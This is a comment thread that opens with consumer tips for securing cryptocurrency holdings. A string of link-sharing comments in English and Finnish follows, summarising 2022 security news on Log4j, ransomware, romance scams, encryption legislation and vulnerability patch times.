1. Use MFA: Wherever possible, enable multi-factor authentication (MFA). Stolen credentials abound on the darkweb, and some of those credentials likely belong to you. Requiring one or more factors in addition to a username and password can help reduce the risk of attackers and fraudsters gaining unauthorized access to your accounts.
2. Use known, reputable exchanges: Cryptocurrencies are not regulated like national currencies. This includes the exchanges used to buy and sell cryptocurrencies. Thus, it is best to be cautious when choosing an exchange. Choose a reputable, reliable, and respected exchange, preferably one that clearly and openly outlines its security measures.
3. Choose your cryptocurrency wisely: There are many different types of cryptocurrencies, and not all cryptocurrencies are created equal. Each has differing levels of security. Should you choose to purchase cryptocurrency, be sure to invest in one that is reputable.
4. Beware of social engineering: Phishing and other scams are a great way for attackers and fraudsters to steal credentials. Those credentials give them access to what they are after. The easiest way to gain access to the cryptocurrencies of others is to flat out ask them for the usernames and passwords to the resources that hold those assets. Don’t fall victim to it.
5. Guard your wallet: The end-user is likely the weakest link in the cryptocurrency chain. As such, access to the end-user digital wallet is exactly the type of target attackers and fraudsters eagerly pursue. Take steps with your digital wallet provider to ensure that you’ve leveraged their ability to help you lock down your account.
Although cryptocurrencies are relatively new, the strategies used by attackers and fraudsters to profit from them don’t appear to be. By understanding that end-users and intermediaries, rather than the cryptocurrencies themselves are the most likely targets for theft and fraud, end-users can take steps to protect themselves. The time invested in considering the points above and others is sure to pay dividends and help avoid fraud loss.
Tomi Engdahl says:
Log4j on eniten hyödynnetty haavoittuvuus
https://etn.fi/index.php/13-news/13154-log4j-on-eniten-hyoedynnetty-haavoittuvuus
Check Point Research kertoo tammikuun haittaohjelmakatsauksessaan, että paljon harmia aiheuttanut salasanavaras Lokibot on palannut listoille. Trickbot on joutunut luovuttamaan ykköspaikkansa Emotetille, ja Apache-palvelinten Log4j jatkaa eniten hyödynnettynä haavoittuvuutena.
Tammikuussa Emotet syrjäytti pitkään listakärjessä pysytelleen Trickbotin. Emotetin esiintyvyys on nyt 6 prosenttia organisaatioista kautta maailman. Log4j aiheuttaa edelleen ongelmia lähes joka toisessa (47,4 prosenttia) organisaatiossa, ja eniten hyökkäyksiä kohdistuu nyt tutkimus- ja koulutusalalle.
Pahamaineinen Emotet-bottiverkko leviää yleisimmin haitallisia linkkejä tai liitteitä sisältävien sähköpostiviestien välityksellä. Trickbot ja Emotet nähdään usein listoilla usein yhtä aikaa, koska Trickbot avaa tietä Emotetille.
Tomi Engdahl says:
Heather Morgan and her husband, Ilya “Dutch” Lichtenstein, seemed to lead a successful life as tech entrepreneurs and thought leaders. But investigators with the IRS say they had a secret. https://trib.al/STZALGp
Tomi Engdahl says:
Kyberhyökkäykset Linuxia vastaan yleistyvät
https://etn.fi/index.php/13-news/13159-kyberhyoekkaeykset-linuxia-vastaan-yleistyvaet
Linux on yksi maailman suosituimmista käyttöjärjestelmistä, joka käytännössä muodostaa osan nykypäivän digitaalisen infrastruktuurin ydintä. Nyt siitä on tulossa monien kyberrikollisten reitti monipilviympäristöihin, varoittaa VMWare tuoreessa tietoturvaraportissaan.
Syynä kehitykseen on se, että suurin osa nykypäivän haitallisista tietoturvaratkaisuista keskittyy Windows-pohjaisiin uhkiin, jolloin monet julkiset ja yksityiset pilvet ovat alttiina Linux-pohjaisiin sovelluksiin kohdistuville hyökkäyksille.
VMwaren järjestelmäsuunnittelun johtaja Claes Sandahlin mukaan kyberrikolliset käyttävät yhä enemmän tekniikoita ja lisäävät haittaohjelmia, jotka kohdistuvat Linux-pohjaisiin käyttöjärjestelmiin maksimoidakseen hyökkäystensä vaikutuksen mahdollisimman pienellä vaivalla. – Hyökkääjät näkevät sekä julkiset että yksityiset pilvet sopivina kohteina, koska ne tarjoavat polun kriittiseen infrastruktuuriin ja luottamuksellisiin tietoihin. Valitettavasti nykypäivän tietoturvaratkaisut keskittyvät usein Windows-pohjaisten uhkien torjuntaan, jolloin monet sovellukset ovat haavoittuvia sekä yksityisissä että julkisissa pilvissä, Sandahl sanoo.
Tomi Engdahl says:
Threat Report: Exposing Malware in Linux-Based Multi-Cloud Environments
https://www.vmware.com/resources/security/exposing-malware-in-multi-cloud.html?utm_source=blog&utm_medium=website&utm_campaign=linux-threat-report&utm_term=none&utm_content=none
Tomi Engdahl says:
Puolet saastuneista Office-dokumenteista ladataan Googlen pilvestä
https://etn.fi/index.php/13-news/13160-puolet-saastuneista-office-dokumenteista-ladataan-googlen-pilvestae
Joka toinen eli 50 prosenttia haittaohjelmilla saastuneista Office-asiakirjoista ladattiin Googlen Drive-pilvipalvelusta viime vuonna. AtlasVPN:n raportti kertoo lisäksi, että 37 prosenttia kaikista haittaohjelmista ladataan Office-dokumenttien mukana.
Raportista käy myös ilmi, että 19 prosenttia haitallisista Office-dokumenteista ladataan käyttäjien koneille Microsoftin OneDrive-palvelusta. Luvut kuvastavat osoittavat Googlen pilvipalvelun suosiota. Microsoftin Sharepoint on kolmanneksi yleisin alusta haittaohjelmien levitykseen Office-dokumenteilla.
Google Drive ohitti Microsoft OneDriven kärkipaikan, joka johti haitallisten Office-dokumenttien levityksessä vielä vuonna 2020 34 prosentin osuudella. Googlen Gmail-palvelun kautta jaettiin neljä prosenttia kaikista haitalisista Office-dokumenteista.
Tomi Engdahl says:
University Project Cataloged 1,100 Ransomware Attacks on Critical Infrastructure
https://www.securityweek.com/university-project-cataloged-1100-ransomware-attacks-critical-infrastructure
A Temple University research project that tracks ransomware attacks on critical infrastructure has documented more than 1,100 incidents to date.
SecurityWeek first wrote about the project in September 2020, when the database included roughly 680 records. The latest version of the critical infrastructure ransomware attacks (CIRWA) database catalogs 1,137 incidents reported between November 2013 and January 31, 2022.
The database, available for free on request as a Microsoft Excel file, stores information on incidents reported by the media and cybersecurity companies.
Ransomware Targeted 14 of 16 U.S. Critical Infrastructure Sectors in 2021
https://www.securityweek.com/ransomware-targeted-14-16-us-critical-infrastructure-sectors-2021
US, UK and Australia Warn of Increase in Sophisticated Ransomware Attacks
An increase in attack sophistication is proof of the growing threat that ransomware poses to all organizations, cybersecurity agencies from the United States, United Kingdom, and Australia said on Wednesday.
Over the past several years, ransomware has become the most prevalent threat to organizations in private and public sectors alike, including financial services, food and agriculture, government, healthcare, and other critical infrastructure industries.
In the U.S., ransomware attacks targeted 14 of the 16 critical infrastructure sectors, as defined by the Department of Homeland Security.
Tomi Engdahl says:
The SASE Conversation in 2022, a Resolution for the Future
https://www.securityweek.com/sase-conversation-2022-resolution-future
SASE can be a game-changer to manage risk during the continuing journey to the cloud
In 2020 Gartner introduced Secure Access Service Edge (SASE), its security methodology for integrating network and security controls to ensure that users receive the correct, risk-based level of access to systems at any moment in time. SASE is gaining momentum and according to Gartner, more than 50 percent of organizations will have an adoption strategy by 2025. Security has become more important than ever for today’s business landscape.
Now, in 2022, I’m sure that many CISOs/CIOs have SASE as a business priority with pressure for a fast and successful implementation. But SASE cannot be simply completed using a tick on the New Year’s resolution list underneath ‘Veganuary’ and ‘Couchto5k.’ SASE is a multi-element end-to-end architecture. Some elements, such as Zero-Trust Network Access (ZTNA), are new for many organizations, but another, Cloud Access Security Broker (CASB), is mature technology and in daily use. Successful adoption of SASE will need time, resource investment and focus.
In an earlier article, Getting SASE without the Hyperbole, I discussed what SASE is and how it could be such a game-changer to manage risk during the continuing journey to the cloud. This emphasized the importance of user experience and ground-up design for success. The last thing any user needs is additional stress from a new security solution when workers are already dealing with continual switches between the office and home-based working (WFA).
Tomi Engdahl says:
IoT/connected Device Discovery and Security Auditing in Corporate Networks
https://thehackernews.com/2022/02/iotconnected-device-discovery-and.html
Tomi Engdahl says:
Log4j: Getting From Stopgap Remedies to Long-Term Solutions
This pervasive vulnerability will require continued care and attention to fully remediate and detect permutations. Here are some ways to get started.
https://www.darkreading.com/attacks-breaches/log4j-getting-from-stopgap-remedies-to-long-term-solutions
Tomi Engdahl says:
https://pentestmag.com/is-blockchain-the-perfect-defense-against-ddos-attacks/
Tomi Engdahl says:
Half Of Canadian Businesses Hit By Ransomware Are Paying The Full Ransom
Tomi Engdahl says:
https://www.forbes.com/sites/leemathews/2022/02/07/half-of-canadian-businesses-hit-by-ransomware-are-paying-the-full-ransom/
Tomi Engdahl says:
https://techcrunch.com/2022/02/07/irs-facial-recognition-id-me/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/law-enforcement-action-push-ransomware-gangs-to-surgical-attacks/
Tomi Engdahl says:
2021 Record Year for Cybersecurity M&A, Financing: Report
https://www.securityweek.com/2021-record-year-cybersecurity-ma-financing-report
2021 was a record year for the cybersecurity industry in terms of mergers and acquisitions, as well as funding activity, according to financial advisory firm Momentum Cyber.
Momentum’s 2022 Cybersecurity Almanac shows that total funding increased by 138% in 2021 compared to the previous year, from $12.4 billion to $29.3 billion in venture capital financing across more than 1,000 deals. This is almost as much as the investments announced in 2018-2020 combined ($30.3 billion).
Tomi Engdahl says:
Mike Masnick / Techdirt:
Senator Blumenthal admits the EARN IT Act won’t “offer a blanket exemption to using encryption as evidence”, after denying for two years it targets encryption — Senator Richard Blumenthal has now admitted that EARN IT is targeting encryption, something he denied for two years, and then just out and said it.
Senator Blumenthal, After Years Of Denial, Admits He’s Targeting Encryption With EARN IT
https://www.techdirt.com/articles/20220210/09311048445/senator-blumenthal-after-years-denial-admits-hes-targeting-encryption-with-earn-it.shtml
Tomi Engdahl says:
Dustin Volz / Wall Street Journal:
Senators Wyden and Heinrich: declassified docs show a CIA bulk surveillance program collecting Americans’ data without clear judicial or congressional oversight
Secret CIA Bulk Surveillance Program Includes Some Americans’ Records, Senators Say
The lawmakers called for the immediate declassification of details about the surveillance program and what data was collected
https://www.wsj.com/articles/secret-cia-bulk-surveillance-program-includes-some-americans-records-senators-say-11644549582?mod=djemalertNEWS
Tomi Engdahl says:
Russell Brandom / The Verge:
The Senate Judiciary Committee advances the EARN IT Act, targeting Section 230 sexual exploitation content protections, despite numerous free speech concerns
Anti-exploitation bill advances in Senate despite free speech concerns
https://www.theverge.com/2022/2/10/22927346/earn-it-act-markup-senate-judiciary-section-230-csam-non-consensual-porn?scrolla=5eb6d68b7fedc32c19ef33b4
Critics say the EARN IT Act would ‘make it far riskier for platforms to host user-generated content’
Tomi Engdahl says:
Ransomware surge prompts joint NCSC, CISA warning to safeguard systems https://portswigger.net/daily-swig/ransomware-surge-prompts-joint-ncsc-cisa-warning-to-safeguard-systems
The UK’s National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Cyber Security Centre published a joint advisory (PDF) on Wednesday that highlighted the evolution of techniques deployed by cybercriminals and the growing maturity of the ransomware-as-a-service business model.
Ransomware victims paid more than $600 million to cybercriminals in
2021
https://therecord.media/ransomware-victims-paid-more-than-600-million-to-cybercriminals-in-2021/
More than $600 million in cryptocurrency could be tied to ransomware payments in 2021, with the Conti ransomware gang accounting for nearly one-third of those payments, blockchain analysis firm Chainalysis said in a report today.
Tomi Engdahl says:
Losses from romance scams hit a record $547 million in 2021, FTC says https://therecord.media/losses-from-romance-scams-hit-a-record-547-million-in-2021-ftc-says/
The US Federal Trade Commission on Thursday said that it measured a sharp increase in losses linked to romance scams in 2021, bringing total losses over the last five years to $1.3 billion. The FTC’s Consumer Sentinel Network, which collects reports about identity theft, coronavirus scams, and other schemes, said Americans lost $547 million to romance scams last year, up from $307 million in 2020 and
$202 million in 2019. The FTC added that these figures likely only capture a small portion of losses suffered by consumers.
Tomi Engdahl says:
Google says default 2FA cut account breaches in half https://www.engadget.com/google-says-2fa-default-cut-account-breaches-193745716.html
Google’s decision to enable two-factor authentication by default appears to have borne fruit. The search firm has revealed that account breaches dropped by 50 percent among those users where 2FA (two-step verification in Google-speak) was auto-enabled. The plunge was proof the extra factor is “effective” in safeguarding your data, Google said, although it didn’t disclose the exact number of compromised accounts.
Tomi Engdahl says:
The FBI said approximately 24,000 Americans lost money from romance scams in 2021, mounting to $1 billion. Though reports of romance scams increased for every age group, the increase was greatest for people ages 18 to 29.
Americans Lost $1 Billion To Romance Scammers Last Year, FBI Says
https://lm.facebook.com/l.php?u=https%3A%2F%2Ftrib.al%2FujpmHd9&h=AT3w_yDsrKODT_EJJR–hKHaRpJjrMNdHufHNsgGaxsusebFXaZ_F-kfbMGpkrII7Qddcrwc0rXP5vs13I4MkfQHy0ePu6E9d2tc3-OGVtBk07V5zkCFcOt7z2C7HtQKLg
About 24,000 Americans lost a reported $1 billion to romance scammers during 2021, the FBI estimated Thursday, marking what the Federal Trade Commission said was the most lucrative year for romance scammers on record—with many scam artists luring their victims into sending cryptocurrency.
The FTC—which only counts scams reported to its Consumer Sentinel Network, a database for scams and crimes like identity theft—said Thursday losses from romance scams rose to $547 million in 2021, up from $307 million in 2020 and $202 million in 2019.
About 25% of losses from scams reported to the FTC last year were paid in cryptocurrency, with the median individual cryptocurrency loss at $9,770, and the agency said a growing number of scammers have tricked victims with fake cryptocurrency investment advice.
Though reports of romance scams increased for every age group, the increase was greatest for people ages 18 to 29, though people in that group reported a median loss of only $750, compared to $9,000 among people age 70 and up, the group for whom losses were greatest.
Though the number of cryptocurrency-related scams grew almost fivefold from 2020 to 2021, gift or reload cards were the most frequent method of payment, used in about 28% of last year’s scams, compared to cryptocurrency at 18%, payment apps or services at 14%, bank transfers or payments at 13% and wire transfers at 12%, according to the FTC.
Tomi Engdahl says:
Vulnerabilities Found by Google Researchers in 2021 Got Patched on Average in 52 Days
https://www.securityweek.com/vulnerabilities-found-google-researchers-2021-got-patched-average-52-days
Google’s Project Zero has observed a decrease in the overall time vendors need to address vulnerabilities reported by the bug hunting team.
Between 2019 and 2021, the team reported a total of 376 vulnerabilities and saw most of them (351) get patched. Of the remaining flaws, 14 are marked “WontFix” by the vendor and 11 remain unfixed.
Per Google Project Zero’s policy, vendors have 90 days to address the security errors, but they can also request a 14-day grace period if a patch will be shipped within that 104-day window.
Out of a sample of 346 vulnerabilities reported and patched between 2019 and 2021, the majority were patched within that window, with only 5% exceeding the deadline and grace period.
Last year, vendors needed an average of 52 days to address the reported issues, down from 54 days in 2020 and 67 days in 2019.
“We can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020,” Google Project Zero says.
“Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days,” the team says.
However, Project Zero also points out that vendors might be rushing to release patches to avoid the risk of public disclosure when the deadline is reached, and encourages vendors to release metrics to paint a better picture of how quickly vulnerabilities are being addressed across the industry.
https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html
Tomi Engdahl says:
https://www.iflscience.com/technology/mark-zuckerberg-warns-not-to-screenshot-your-facebook-chats/
Tomi Engdahl says:
Vulnerability Scanning Triples, Leading to Two-Thirds Fewer Flaws
Companies are scanning more applications for vulnerabilities — and more often.
https://www.darkreading.com/application-security/vulnerability-scanning-triples-leading-to-two-third-fewer-flaws
Tomi Engdahl says:
Log4j and the Role of SBOMs in Reducing Software Security Risk
Enterprises are spending a pittance on securing their software supply chain, which makes COTS software dangerous — vulnerabilities can be “hidden” in open source components.
https://www.darkreading.com/vulnerabilities-threats/log4j-and-the-role-of-sboms-in-reducing-software-security-risk
Tomi Engdahl says:
Intel Owl- Open Source Cyber Threat Intelligence Project
https://hackersonlineclub.com/intelowl-open-source-cyber-threat-intelligence-project/